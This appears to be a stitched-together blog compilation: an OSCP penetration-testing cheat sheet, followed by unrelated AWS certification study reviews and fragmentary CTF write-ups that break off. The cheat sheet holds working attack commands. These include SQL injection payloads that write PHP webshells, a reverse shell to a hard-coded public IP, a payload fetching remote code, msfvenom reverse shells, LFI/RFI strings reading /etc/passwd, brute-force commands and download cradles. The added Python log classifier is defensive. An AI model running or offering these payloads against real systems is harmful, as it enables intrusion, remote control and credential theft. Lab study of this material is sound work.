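Introduction to the OSCP Certification

OSCP (Offensive Security Certified Professional) is a hacking certification offered by Offensive Security. *Offensive Security is an American international information security company that provides the ExploitDB vulnerability database and Kali Linux.

Unlike other information security certifications, it is a 100% hands-on exam in which you have to hack within 24 hours.

Because you must hack within the given time and then submit a report, it costs more than typical information security certifications and has a lower pass rate. Even so, in the US simply earning this certification guarantees a base salary of 100k – 120k (100 – 120 million KRW), which shows that it is one of the most widely recognized certifications.

OSCP Certification

  • Organizer : Offensive Security
  • Exam : 100% hands-on
    • Exam time : 24 hours + 24 hours (report writing) = 48 hours in total
    • Exam content : Gain top-level administrator privileges on the given virtual machines within 24 hours, then submit a penetration test report within the following 24 hours.
    • Preparation time : 6 – 9 months (varies by person)
  • Official site : https://www.offensive-security.com/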

Scanning – Web

Web Login Form Bruteforcing

HTTP Hydra

hydra -l admin -P /usr/share/wordlist/SecList/Passwords/10k_most_common.txt 192.168.88.162 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64

PUT method

nmap -sV --script http-put --script-args http-put.url='/test/meterpreter4444.php',http-put.file='/root/Exam0119/pwd/192.168.111.149/meterpreter4444.php' -p 80 192.168.111.149
nmap --script http-methods --script-args http-methods.url-path='/uploads',http-methods.test-all -p 8585 172.28.128.3

Starting Web Service

//Attacker usually uses this to transfer files
python -m SimpleHTTPServer 8080
python3 -m http.server 80

Nmap Scanning for Web Service(HTTP/HTTPS)

nmap -PN -p 22 --open -oG - 10.11.1.* | awk '$NF~/ssh/{print $2}'
nmap 10.11.1.* -p22,80 --open -oG - | awk '/22\/open.*80\/open/{print $2}'
nmap 10.11.1.* -p80,8080 --open -oG - | awk '/80\/open.*8080\/open/{print $2}'
nmap -p 80,8080 10.11.1.1-255

– Uniscan Scanning

uniscan.pl -u target -qweds

– HTTP Enumeration 

httprint -h http://www.example.com -s signatures.txt

– Directory Traversal 

To navigate and find any sub directories.
Dirbuster Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

dirb http://10.11.1.202 /usr/share/dirb/wordlists/vulns/iis.txt
gobuster -u http://10.11.1.133/ -w /usr/share/wordlists/dirb/common.txt -q -n -e
dirb http://10.11.1.133/index/sips/ /usr/share/dirb/wordlists/
./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $targetip -e php
//cf. https://github.com/maurosoria/dirsearch

//show only responses with status code 200,204,301,307,403
gobuster -s 200,204,301,307,403 -u http://192.168.88.168 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

– Nikto 

nikto -h 192.168.88.132
nikto -h http(s)://[IP]:[PORT]/[DIRECTORY] 
nikto -C all -h http://10.11.1.72

LFI(Local File Inclusion)

lfisuite.py
eg.

browse.php?file=php://filter/convert.base64-encode/resource=ini.php
browse.php?file=php://filter/convert.base64-encode/resource=browse.php
echo -n encodedstrings | base64 -d
browse.php?file=/etc/passwd
index.php?file=

If the target has phpinfo.php, check whether “file_uploads” appears as enabled (On); if so, the target is vulnerable to LFI.

Uploading malicious .php file on database 

ref : http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
SQL-phpshellscript : create below malicious (shell).php script on DB

Windows : SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"
Linux : SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"

After uploading the above malicious PHP webshell, browse to the page with a command, e.g. http://192.168.1.101/DBlocation/shell.php?cmd=ipconfig

RFI(Remote File Inclusion) 

eg.

browse.php?file=http://10.11.0.42/index.html
browse.php?file=ftp://10.11.0.42/index.html
browse.php?expect://ls

Gain a shell via phpinfo.php ref: https://office.tuxcon.com/root/web-sec-payloads/src/commit/fd99da6c06e00a596becdcfc6d2efe50bad0f47c/File Inclusion – Path Traversal
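
Seen from the web server's side, the LFI and RFI request patterns listed above are easy to spot in an access log. The following is an added example, not part of the original notes: a small classifier for request URIs. The rule names, the sample URIs and the double-encoded case are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Rule name -> pattern applied to every fully decoded query key and value.
RULES = [
    ("stream-wrapper", re.compile(r"^(php|expect)://", re.I)),
    ("remote-include", re.compile(r"^(https?|ftp)://", re.I)),
    ("local-path", re.compile(r"\.\.[/\\]|^/etc/", re.I)),
]


def fully_unquote(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %252e -> %2e -> '.')."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(request_uri):
    """Return the sorted rule names that fire for one request URI."""
    hits = set()
    query = urlsplit(request_uri).query
    # keep_blank_values keeps 'browse.php?expect://ls', where the payload
    # is the parameter *name* and the value is empty.
    for key, value in parse_qsl(query, keep_blank_values=True):
        for candidate in (fully_unquote(key), fully_unquote(value)):
            for name, pattern in RULES:
                if pattern.search(candidate):
                    hits.add(name)
    return sorted(hits)


# Constructed request URIs: the first five mirror the patterns in these notes,
# the last two are benign traffic that must not be flagged.
SAMPLE_URIS = [
    "/browse.php?file=php://filter/convert.base64-encode/resource=ini.php",
    "/browse.php?expect://ls",
    "/browse.php?file=ftp://10.11.0.42/index.html",
    "/browse.php?file=/etc/passwd",
    "/browse.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd",
    "/search.php?q=see+http://example.com/docs",
    "/index.php?page=about.php",
]


def scan(uris=SAMPLE_URIS):
    """Map each suspicious URI to the rules it triggered."""
    results = {}
    for uri in uris:
        rules = classify(uri)
        if rules:
            results[uri] = rules
    return results


if __name__ == "__main__":
    for uri, rules in scan().items():
        print(",".join(rules), uri)
```

The patterns are anchored to the start of the decoded value, so a search term that merely mentions a URL is not flagged; parameters that legitimately carry full URLs (redirect targets, for example) need an allow-list.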

Squid 

proxy scanner/http/squid_pivot_scanning
RHOST : Target
RANGE : Target
RPORT : Squid port

msf auxiliary(scanner/http/squid_pivot_scanning) > run
[+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED
[+] [192.168.88.155] 192.168.88.155:80 seems OPEN
If the target uses a squid proxy on port 3128, use nikto with that proxy setting
nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128

ShellShock 

nikto scan results; shows shellshock on /cgi-bin; use 34900.py

root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/status

MySQL 

nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306

MySQL login : mysql -h 192.168.88.152 -D wordpress -u root -p plbkac
MySQL Spawning Reverse shell(linux) : union select "<?php exec(\"/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\");" INTO OUTFILE '/var/www/ecustomers/samshell4.php'

UPLOAD A FILE :

' union select "<?php file_put_contents(\"root\", file_get_contents(\"http://attack.samsclass.info/root\")); ?>" INTO OUTFILE '/var/www/ecustomers/samget2.php' #

OPEN A PHP SHELL :

' union select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/ecustomers/samshell.php' #

Windows IIS 

Getting Windows OS and version details through Nikto / Nmap Scanning.

auxiliary/admin/http/iis_auth_bypass

Tomcat 

Default cred for Tomcat: “tomcat/tomcat”. Check out the /manager console by navigating to it in a browser, e.g. http://10.11.1.209:8080/manager/html
You can upload a reverse shell on the manager console ; msfvenom jsp or war file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.37 LPORT=443 -f war > shell.war
jar -xvf shell.war

Config files 

PHP + DB cred files

/etc/mysql/my.cnf 
/var/www/html/config.php

WordPress 

wpscan --url http://10.11.1.71/ --enumerate p
wpscan --url 10.0.2.4 --enumerate vp
wpscan --url https://192.168.88.152:12380/blogblog --enumerate u --disable-tls-checks
wpscan --url http://192.168.88.179/wordpress/ --wordlist /usr/share/wordlists/rockyou.txt
wpscan --url https://192.168.88.152:12380/blogblog/ --enumerate ap --disable-tls-checks
wpscan --url www.local.test --enumerate u --threads 50

ref : finding username & password(autoscript) : https://github.com/claudioviviani/bash-wordpress-xml-bruteforce

phpMyAdmin

http://.../phpmyadmin
The db and password are located @ /etc/phpmyadmin/config-db.php and the default cred can be (root/blank)(pma/blank)
You can also bruteforce with hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"

Webdav

WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
auxiliary : webdav_test

cadaver http://10.11.x.x/webdav/

Uploading shells.txt to `shells.txt'

dav:> put shells.txt
dav:> copy shells.txt shells.asp;.txt

ColdFusion (Vulnerable)

Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
LFI(password file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
(either – neo-security.xml and password.properties)
ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

exploit/windows/http/coldfusion_fckeditor – only for 8.0.1

XAMPP

XAMPP cred(wampp/xampp)

RealVNC

RealVNC : https://www.exploit-db.com/exploits/36932
Edit BIND_ADDR to my address and BIND_PORT to 4444
root@kali:~/PWK-Lab/10.11.1.227$python RealVNC-exploit-36932.py
[] Please input an IP address to pwn: 10.11.1.227
[] Hello From Server: RFB 003.008
Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del

SquirrelMail

https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh

AT-TFTP

1.9 version : ref: https://github.com/brianwrf/cve-2006-6184

perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.37 LPORT=443 R > payload
cat stackadj payload > shellcode
cat shellcode | msfvenom -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f python

MISC

Drupal cred(admin/admin)
Elastix cred(admin/admin) http://example.com/vtigercrm/
You might be able to upload shell in profile-photo.

Post-Exploit: Transferring Files

File Transfer

The methods below can be used to transfer files…

Transferring Files to Windows

Running Webserver on Kali

python -m SimpleHTTPServer 8080 

Transfer with Netcat

//Kali
nc -lvp 1234 > zeroday.txt
//Win 
nc 192.168.0.114 1234 < zero-day.txt

ref: https://blog.ropnop.com/transferring-files-from-kali-to-windows/

TFTP 
If target has tftp running, you can easily check it by typing tftp on windows cmd.
Starting tftp service :

atftpd --daemon --port 69 /tftp 
/etc/init.d/atftpd restart
cd /srv/tftp
cp /var/www/html/nc.exe .

//transfer nc.exe  
tftp -i 10.11.0.42 GET nc.exe
//PUT
tftp -i 10.11.0.42 PUT test.txt

FTP 
Setup FTP service by downloading pyftp library

apt-get install python-pyftpdlib  
python -m pyftpdlib -p 21 -w

Transfer with FTP commands

You can also automate ftp process by creating ftp.txt

echo open 10.11.0.42>ftp.txt
echo anonymous>>ftp.txt
echo password>>ftp.txt
echo binary>>ftp.txt
echo get nc.exe>>ftp.txt 
echo bye>>ftp.txt
ftp -s:ftp.txt

cf. Setting FTP

groupadd ftpgroup 
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome 
pure-pw mkdb 
cd /etc/pure-ftpd/auth/ 
ln -s ../conf/PureDB 60pdb 
mkdir -p /ftphome 
chown -R ftpuser:ftpgroup /ftphome/ 
/etc/init.d/pure-ftpd restart

root@kali:~# chmod 755 setup-ftp 
root@kali:~# ./setup-ftp 
Password: 
Enter it again: 
Restarting ftp server

Creating VBscript 
wget.vbs * VBScript (eg. in Windows XP, 2003)

//wget.vbs

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Usage : cscript wget.vbs http://10.11.0.42/wget.exe wget.exe

PowerShell- (in Windows 7, 2008, and above)
wget.ps1

echo $storageDir = $pwd > wget.ps1 
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://10.11.0.42/nc.exe" >>wget.ps1 
echo $file = "nc.exe" >>wget.ps1 
echo $webclient.DownloadFile($url,$file) >>wget.ps1 

Usage : powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Basic Scanning

Default Nmap Scanning

nmap -sU -sV -n --top-ports 200 192.168.1.30  > /root/PWK-Lab/192.168.1.30/nmap-udp
nmap -sT -sV -A -O -v -p 1-65535 192.168.1.30 > /root/PWK-Lab/192.168.1.30/nmap-tcp

-sS stealth scanning

nmap -vv -Pn -A -sC -sS -T 4 -p- 10.x.x.x
nmap -p- -sS -A 10.x.x.x
  • Vulnerability Scanning : nmap -sS -sV --script=vulscan/vulscan.nse 10.x.x.x
  • OS detection : nmap -O -v 10.x.x.x

Automated scanning tools

  • Reconnoitre : python /root/Recon/Reconnoitre/reconnoitre.py -t 10.x.x.x -o /root/PWK-Lab/10.x.x.x/ --services
  • OneTwoPunch : vi targets.txt; onetwopunch.sh -t targets.txt -p all -n "-sV -O --version-intensity=9"
  • unicornscan -i tap0 -I -mT 10.x.x.x:a
  • masscan -p0-65535 10.x.x.x --rate 150000 -oL output.txt

Scanning per protocols

– SSH(22)

  • Bruteforce :
nmap -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=users.txt --script-args ssh-brute.timeout=4s 10.x.x.x 
hydra -l user -P /usr/share/wordlists/rockyou.txt  10.x.x.x ssh -t 4

ref : https://github.com/g0tmi1k/debian-ssh && https://blog.g0tmi1k.com/2010/04/pwnos/
OpenF*** (Apache mod_ssl < 2.8.7 OpenSSL) 764.c

– FTP(21)

  • Default cred : anonymous/anonymous | ftp/ftp | ftpuser/ftpuser
nmap -sV -Pn -vv -p 21  --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 10.x.x.x
nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.x.x.x
check windows OS files : https://www.quora.com/How-can-I-tell-what-version-of-Windows-is-installed-on-a-hard-drive-without-booting-it 
  • Bruteforce :
medusa -h 10.x.x.x -u user -P /root/SecLists/Passwords/bt4-password.txt -M ftp 
./root/PWK-Lab/FTP/ftp-user-enum-1.0/ftp-user-enum.pl -U /root/PWK-Lab/fuzzdb/bruteforce/names/simple-users.txt -t 10.x.x.x

– SMTP(25)

  • Vulnerability Check
nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.x.x.x 
  • Enumerating Users
nmap --script smtp-enum-users.nse 10.x.x.x

smtp-user-enum -M VRFY -U users.txt -t 10.x.x.x
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.x.x.x
smtp-user-enum -M VRFY -U  /usr/share/seclists/Usernames/Names/names.txt -t 10.x.x.x
  • Connecting to Mail Server
telnet IPADDRESS 25
nc -nvv IPADDRESS 25
  • msf module : auxiliary/scanner/smtp/smtp_enum

– POP3(110)

  • Bruteforce : hydra -L usr.txt -P /usr/share/wordlists/fasttrack.txt -t20 10.x.x.x -s55007 -I pop3
  • POP3 command
USER boris
PASS *****
LIST 
RETR 1 

– SNMP(161)

  • Default Community Strings : public/private/manager
snmp-check -t [IP] -c public 
snmpwalk -c public -v1 10.0.0.0 
nmap -sU --open -p 161 10.11.1.0/24 -oG mega-snmp.txt 
sudo nmap -sU -p 161 --script default,snmp-sysdescr 10.11.1.0/24 
onesixtyone -c community -i ips 
nmap 10.11.1.* -p161 --open -oG - | awk '/161\/open/{print $2}' 

– SMB(139,445)

  • Checking SMB port open/running :
nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt; grep Up smb_service.txt | cut -d " " -f 2  
nmap 10.11.1.* -p139,445 --open -oG - | awk '/139\/open.*445\/open/{print $2}'  
  • Vulnerability scanning 

 nmap -p 139,135,445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.x.x.x

  • Enumerating Users  

nmap --script smb-enum-users.nse -p445 10.x.x.x
nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 10.x.x.x

  • smbclient
smbclient -L //10.x.x.x/share -U user 
smbclient //10.x.x.x//IPC$ -N  
  • checking access
acccheck -v -t 10.x.x.x  -u user -P /usr/share/dirb/wordlists/common.txt  
acccheck -v -t 10.x.x.x -U /root/Vulnhub/Stapler/user.txt  -P /usr/share/dirb/wordlists/common.txt  
  • smbmap
smbmap -u user -p user -d share -H 10.x.x.x  
smbmap -u user -p .bash_history -d share -H 10.x.x.x  
smbmap -H 10.x.x.x\share -u user -p '.bash_history' -L  

ref : https://hackercool.com/2016/07/smb-enumeration-with-kali-linux-enum4linuxacccheck-smbmap/
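
The awk filters over `nmap -oG -` output used in the web, SNMP and SMB sections match substrings, so a pattern such as 22\/open.*80\/open also matches a host that only has 8022 and 8080 open. The following is an added example, not part of the original notes: a field-aware parser for grepable output. The sample scan output is constructed.

```python
import re

# Constructed sample in the shape of `nmap -oG -` output (hosts are made up).
SAMPLE_GNMAP = (
    "# constructed grepable nmap output\n"
    "Host: 10.11.1.5 ()\tStatus: Up\n"
    "Host: 10.11.1.5 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\n"
    "Host: 10.11.1.8 ()\tPorts: 80/open/tcp//http///, 8080/open/tcp//http-proxy///\n"
    "Host: 10.11.1.9 ()\tPorts: 8022/open/tcp//ssh///, 8080/open/tcp//http-proxy///\n"
    "Host: 10.11.1.12 ()\tPorts: 22/filtered/tcp//ssh///, 80/open/tcp//http///\n"
    "# Nmap done\n"
)


def parse_gnmap(text):
    """Return {host: {port: {'state', 'proto', 'service'}}} from grepable output."""
    inventory = {}
    for line in text.splitlines():
        if not line.startswith("Host: ") or "Ports: " not in line:
            continue
        host = line.split()[1]
        # The Ports field ends at the next tab (e.g. before "Ignored State:").
        ports_field = line.split("Ports: ", 1)[1].split("\t")[0]
        for entry in ports_field.split(","):
            # port/state/protocol/owner/service/rpcinfo/version/
            fields = entry.strip().split("/")
            if len(fields) < 5 or not fields[0].isdigit():
                continue
            inventory.setdefault(host, {})[int(fields[0])] = {
                "state": fields[1], "proto": fields[2], "service": fields[4],
            }
    return inventory


def hosts_with_all_open(text, wanted):
    """Hosts on which every port in `wanted` is reported as open."""
    return [
        host for host, ports in parse_gnmap(text).items()
        if all(ports.get(p, {}).get("state") == "open" for p in wanted)
    ]


def awk_style(text, pattern):
    """Emulate `awk '/pattern/{print $2}'` for comparison."""
    return [l.split()[1] for l in text.splitlines() if re.search(pattern, l)]


if __name__ == "__main__":
    print("substring match:", awk_style(SAMPLE_GNMAP, r"22/open.*80/open"))
    print("field match    :", hosts_with_all_open(SAMPLE_GNMAP, [22, 80]))
```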

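OSCP Study Method – Buffer Overflow

To pass the OSCP you need to know buffer overflows (BoF) well. Offensive Security already provides a lot of BoF material, but the Lab and Course exercises provided in PWK are not enough to prepare for the exam.

So, to prepare for the exam, I deliberately studied by adapting the usable BoF vulnerabilities on Exploit-db. On exploit-db (https://www.exploit-db.com/) you can see a wide variety of vulnerabilities and the code that exploits them.

I searched for Buffer Overflow, filtered on whether a vulnerable application was available and, where one was, built a similar environment in a VM and practiced writing the code. (For example, for the SLmailv5.5 buffer overflow vulnerability, I downloaded the vulnerable program from exploit-db, set it up on a Windows VM, and then built the BoF myself and attacked it from my attacking Kali machine.)

Many programs for buffer overflow practice are already posted on other sites; I used the vulnerable programs below.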

AWS Certified Security Specialty Study Guide

Overall, it took me about 3 months to study for this exam alongside a full-time 40 hrs/week job. I’m pretty sure anyone who has more hands-on experience in an AWS environment will take less than 3 months to pass this exam.

Study Material;

 

Study Plan;

I spent the first two months listening to the ACloudGuru course and making my own notes, then watched LinuxAcademy. The ACloudGuru course does cover all of the exam topics, though you still need to fill in more details from the AWS FAQ or whitepapers. I really like the structure of A Cloud Guru’s course, which has a summary video and practice quiz for each chapter, so students can refresh their memory and do further research & study based on the quiz feedback. The Linux Academy course has a really useful feature, the lab, where you can go into their temporary AWS console and practice. If you prefer to learn hands-on, I would recommend LinuxAcademy.

 

*TIPS* Since we are busy workers or have other things to do in real life, it’s pretty tough to find extra time for studying. So I printed out the courses’ summaries/notes in a small pocket size and read them during my commute or at lunch time at work. You can find summary & exam notes on GitHub or Quizlet: Brianlam38 github and Antoine_Sylvia quizlet. I also uploaded the mindmap that I created during the aCloudGuru course to my GitHub.

After finishing the online courses over 2 months, I started practicing with an exam simulator. I took the ACloudGuru Exam Simulator and got 60 at first… and I realized that I had never studied this topic in a scenario-based way before. *Unlike the AWS Practitioner Exam, the Security Specialty Exam has a lot of scenario-based questions, and you have to choose the more reasonable or more secure answer (depending on the question, the answer can be the cost-effective choice). So I practiced with ACloudGuru & BrainCert and learned AWS security services through real-life examples, because I ended up reading a bunch of AWS whitepapers and AWS Security Blog articles based on the feedback I got from each test.

By the time I got a score of 95 on the ACloudGuru Exam Simulator, I decided to book the exam. I also took the AWS Certified Security Specialty practice exam online, but this one doesn’t show how much you scored or which questions you got wrong. So you can buy a practice exam (it was free for me since I got a voucher code from a previous AWS cert exam) if you want to see the level of difficulty of the exam.

If you prefer to read additional study material & study plans, I find the blogs & sites below useful;

 

AWS Certified Security Specialty Exam Review – 2020

The AWS Certified Security – Specialty helps you build a broad understanding of the security principles and architecture of the AWS environment, and also a deep dive into the security tools and services that AWS provides.

The exam format is multiple choice, multiple answers; 170 minutes (practice test is $40) and it costs 300 USD. *TIPs* When you register for your exam or practice exam, you can get 50% OFF the exam fee and a FREE practice exam if you have vouchers to use from a previous AWS cert test. Luckily, I had vouchers to use for both after passing the practitioner test.

For more details about the exam, please check the AWS official website and the AWS Certified Security Specialty Exam Guide.

I took the exam on Feb 17th, 2020 at 10:00AM; it took me literally the entire 160 minutes to finish. I had 10 minutes left before time ran out, and had 5 more survey questions after the exam question review :o.. The level of the exam is tougher than I thought. I’m glad that I passed. I will post more about the study plan & material I used in the next post.

AWS Certified Practitioner Exam Review-2019

AWS Certified Cloud Practitioner; passing exam within one month.

I started studying for AWS Certified Cloud Practitioner on Aug 31st. I finished all 6 chapters from a CloudGuru during weekends. I believe the course itself is 6 hours total.

During the video lectures, I wrote down a few keynotes & summaries, since I tend to get easily distracted with online courses. After memorizing the keynotes and summarizing the notes, I finished the practice test on CloudGuru with a score of 86. I then spent one or two weeks reading the suggested whitepapers from the AWS exam guide. I only read the 3 whitepapers below, just one time each.

  • Overview of Amazon Web Services whitepaper, July 2019
  • Architecting for the Cloud: AWS Best Practices whitepaper, October 2018
  • How AWS Pricing Works whitepaper, June 2018

After that, I purchased the AWS Certified Cloud Practitioner practice test on Udemy. I personally feel the level of difficulty is like this:

[ AWS Cloud Guru Practice Test < Exam < Udemy Practice Test ].

So I want to point out that the actual exam questions can be more difficult than the CloudGuru Practice Test.

There’s also a (free) course on the AWS training website for AWS Cloud Practitioner, but personally I find CloudGuru more informative and user-friendly. So I skipped the AWS training course and just completed the AWS Cloud Practitioner practice test (free).

While taking the Udemy practice test, I noticed there were a few terms that I had never heard of during the CloudGuru course. I had probably read them in the AWS whitepapers before.. So I reviewed the Udemy answers and memorized the terms that appeared frequently during the test.

 

AWS Certified Cloud Practitioner; Online Exam (CBT)

I booked a proctored exam on Sept 28th for 4PM (EST). I booked the computer-based exam online. You can check more details about how to book the online exam: https://aws.amazon.com/blogs/apn/now-you-can-take-the-aws-certified-cloud-practitioner-exam-at-your-home-or-office-24-7/

I joined the exam interface 30 minutes early and confirmed all the devices were working fine. There were some technical issues during the exam, but they didn’t impact me much during the 90 minutes of exam time.

ctfbook-web

After executing the program, it shows a login page and a mailbox image. For some reason, it does not allow us to modify or click anything.

To check out this program, I ran an nmap scan against the local IP 127.0.0.1 to see which ports and protocols were running. I noticed that port 25 is open with the ESMTP protocol.

So I telnetted into the mail server and checked the banner (title).

I tried to pull the spam email via SMTP commands, but the data did not seem to be pulled or listed. Instead of checking the emails, I tried sending emails.

Since the program is named XSS Bonasai Revolutions, cross-site scripting might be related, so I sent the email below and checked the program.

Now I can see the vulnerable field is the date, so I put XSS instead of <img src=0>

 

 

ctfbook-network

Under DESCRIPTOR RESPONSE for USB Device, I can check the Vendor and product information for USB Device. https://wiki.wireshark.org/USB

I need to find out what type of file it is from the URB_INTERRUPT in traffic, by noticing the difference